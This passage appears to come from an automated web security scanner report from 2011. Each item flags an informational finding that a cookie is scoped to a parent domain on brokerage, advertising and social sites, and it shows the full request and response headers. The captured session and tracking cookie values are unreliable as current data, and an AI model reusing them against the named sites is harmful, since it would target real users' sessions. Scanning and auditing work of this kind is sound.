Set-Cookie: TLTHID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* global JS methods */
Array.prototype.indexOf = function (obj) {
   for (var i = 0; i < this.length; i++) {
       if (this[i] == obj) return i;
   }
   return -1;
}
Array.prototype.has = function (obj)
...[SNIP]...

9.44. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcv-srv20.inplay.tubemogul.com
Path:   /StreamReceiver/services

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /StreamReceiver/services HTTP/1.1
Host: rcv-srv20.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
Content-Length: 1000
Origin: http://ibkb.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml; charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA

<?xml version="1.0" encoding="utf-8"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" xsi:schemaLocation="http://www.illumenix.com/StreamReceiver/services/schemas streamm
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpi=MjAxMTA5MDg_MjotNTY3NTYzMzQyMTY5OTg1NzUxNzozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close
Content-Length: 1334

<?xml version="1.0" encoding="UTF-8" standalone="no"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" version="2"><Response><PlayerUpdateResponse requestStatus="success"/
...[SNIP]...

9.45. http://receive.inplay.tubemogul.com/StreamReceiver/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /StreamReceiver/demo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /StreamReceiver/demo?segment=000&zip=&age=&gender= HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
P3P: cp="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"
host: rcv-srv04
Content-Type: image/gif
Content-Length: 43
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

GIF89a.............!.......,...........D..;

9.46. http://rtd.tubemogul.com/upi/pid/5w3jqr4k  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtd.tubemogul.com
Path:   /upi/pid/5w3jqr4k

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upi/pid/5w3jqr4k?puid=E1&tmid=-5675633421699857517 HTTP/1.1
Host: rtd.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; _tmpi=MjAxMTA5MDg_MTQ6LTU2NzU2MzM0MjE2OTk4NTc1MTc6MzA

Response

HTTP/1.1 200 OK
Expires: Thu, 8 Sep 2011 15:54:09 EDT
Set-Cookie: _tmpi=MjAxMTA5MDg_MzpFMTozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzozMA;Path=/;Domain=.tubemogul.com;Expires=Fri, 07-Sep-12 19:54:09 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: cp="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"
Content-Type: image/png
Content-Length: 2791
Connection: close
Server: Jetty(7.0.1.v20091125)

.PNG
.
...IHDR..............wS....    pHYs..........+....
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

9.47. http://server.iad.liveperson.net/hc/82583755/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/82583755/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/82583755/?&site=82583755&cmd=mTagInPage&lpCallId=81533422560-705066007077&protV=20&lpjson=1&page=http%3A//www.pfgbest.com/toolkit/&id=3455414662&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true HTTP/1.1
Host: server.iad.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pfgbest.com/toolkit/
Cookie: HumanClickKEY=8343694331452677533; LivePersonID=-546022977410-1315512341:-1:-1:-1:-1; HumanClickSiteContainerID_82583755=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1315512340571

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:05:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_82583755=STANDALONE; path=/hc/82583755
Set-Cookie: LivePersonID=-546022977410-1315512341:-1:-1:-1:-1; expires=Fri, 07-Sep-2012 20:05:44 GMT; path=/hc/82583755; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 08 Sep 2011 20:05:44 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"81533422560-705066007077","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-30", "js_code": "lpMTag.lpInPageRequestDelay=30;"}]}});

9.48. http://shared.websol.barchart.com/css/bc_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shared.websol.barchart.com
Path:   /css/bc_styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/bc_styles.css HTTP/1.1
Host: shared.websol.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.transworldfutures.com/quotes.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:59:55 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Tue, 23 Aug 2011 19:10:14 GMT
ETag: "1915d8-e93-4ab30f2047180"
Accept-Ranges: bytes
Content-Length: 3731
Content-Type: text/css
Via: 1.1 websol.barchart.com (Apache/2.2.9)
P3P: CP="NON ADM OUR STP"
Set-Cookie: WEBSOL_SERVER=balancer.websol02; path=/; domain=.websol.barchart.com
Content-Language: en

@import url('options.css');
@import url('customquotes.css');
@import url('quickquotes.css');
@import url('searchbox.css');
@import url('lookup.css');
@import url('support.css');


.bcDisclaime
...[SNIP]...

9.49. http://www.facebook.com/dialog/feed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/feed

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Thu, 15-Sep-2011 19:46:43 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.238.47
Connection: close
Date: Thu, 08 Sep 2011 19:46:43 GMT
Content-Length: 15182

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="rM4U";</script><noscr
...[SNIP]...

9.50. http://www.interactivebrokers.com/mkt/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interactivebrokers.com
Path:   /mkt/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mkt/index.php?src=googlead&url=/futures&w=%22futures%20trading%22&kw=futures%20trading&c=US&gclid=CJS3rJiwjqsCFWUZQgod1yoIvg HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:40 GMT
Server: Apache
Set-Cookie: web=1059283; expires=Tue, 06-Mar-2012 19:24:40 GMT; path=/; domain=.interactivebrokers.com
Location: http://www.interactivebrokers.com/futures
Content-Length: 0
Connection: close
Content-Type: text/html


9.51. https://www.interactivebrokers.com/sso/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interactivebrokers.com
Path:   /sso/Login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/Login?forwardTo=1 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:49:03 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: XYZAB_AM.LOGIN=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: XYZAB=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: URL_PARAM=forwardTo=1; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: JSESSIONID=6CABFA1224B746F03649A64DE5E8609E.wwwsso3; Path=/sso; Secure
Content-Length: 13244
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"/>
   <link hre
...[SNIP]...

9.52. http://www.optionsxpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=04B1BF674AA82952BE73E0BB9321CE27; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.53. http://www.optionsxpress.com/404.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /404.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /404.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=5389B1BA4FEE5685909C00A038A8CFC8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.54. http://www.optionsxpress.com/about_us/awards_media.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/awards_media.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/awards_media.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23004
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=320A610B4D68A51B3DD0EDA975F816D5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.55. http://www.optionsxpress.com/about_us/contact_us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/contact_us.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/contact_us.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15835
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D94486F745F6D69F0A802998A11A2DA7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.56. http://www.optionsxpress.com/about_us/faq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/faq.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/faq.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 111500
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FDB057F449CCC1CA91E51FB7506FD090; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.57. http://www.optionsxpress.com/about_us/pricing_commissions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/pricing_commissions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/pricing_commissions.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29277
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=3D1739C84DE61CD48C8F6B861E31DA2D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.58. http://www.optionsxpress.com/check_us_out/right_for_you.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /check_us_out/right_for_you.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check_us_out/right_for_you.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27517
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=715ECFF14E81ECE5EAFEBAAFF695BBCC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

9.59. http://www.optionsxpress.com/check_us_out/site_map.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /check_us_out/site_map.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check_us_out/site_map.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17804
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D768A97844BACABDD1F614A652521D30; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.60. http://www.optionsxpress.com/corporate/about_us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /corporate/about_us.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corporate/about_us.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16271
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=327ED9384FEDA364E7B5AFB955A11898; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.61. http://www.optionsxpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527926087%27%5D%5D; s_campaign=gsus23305007; s_sq=%5B%5BB%5D%5D; TLTHID=380F36E2451D516527B89FB8B2599BF0; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
ETag: "062bdc6ea9c91:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D651080C4FB698B6CDD7B5BFFD951C11; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:53 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

9.62. http://www.optionsxpress.com/free_education/education_center.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /free_education/education_center.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free_education/education_center.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=1CA0C870418D7340D8EA988105E71B36; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.63. http://www.optionsxpress.com/free_education/live_events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /free_education/live_events/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free_education/live_events/ HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14135
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FAD2A00E48BCF7D008C49D8DF9519925; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.64. http://www.optionsxpress.com/free_education/virtual_trade.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /free_education/virtual_trade.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free_education/virtual_trade.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 272
Content-Type: text/html
Location: http://www.optionsxpress.com/tools_research/virtual_trade.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
